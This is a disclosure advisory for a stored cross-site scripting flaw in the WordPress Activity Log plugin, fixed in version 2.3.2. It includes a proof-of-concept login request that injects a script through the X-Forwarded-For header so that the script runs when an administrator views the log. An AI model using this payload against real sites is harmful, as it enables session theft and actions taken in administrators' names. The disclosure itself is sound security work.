This issue has been fixed in version 2.3.2 of the WordPress Activity Log plugin. The updated plugin can be downloaded from the following location: https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip.
Introduction
The WordPress Activity Log plugin allows monitoring and tracking of site activity on a WordPress site. A stored Cross-Site Scripting vulnerability has been discovered in the WordPress Activity Log plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log (WP admin).
Details
The WordPress Activity Log plugin fails to sufficiently check input supplied to the X-Forwarded-For HTTP header and perform output encoding when the input is presented in a "wrong password event". As a result the malicious request will be stored in the Activity Log page, executing the payload when an unsuspecting user views this specific page.
An attacker can use this vulnerability to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
Persistent Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users (victims).
Proof of concept
This vulnerability can be demonstrated by submitting an XFF header similar to the following:
POST /wp-login.php HTTP/1.1
Host: 192.168.28.135
Content-Length: 113
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
X-Forwarded-For: <script>alert(document.cookie);</script>
Connection: close
log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1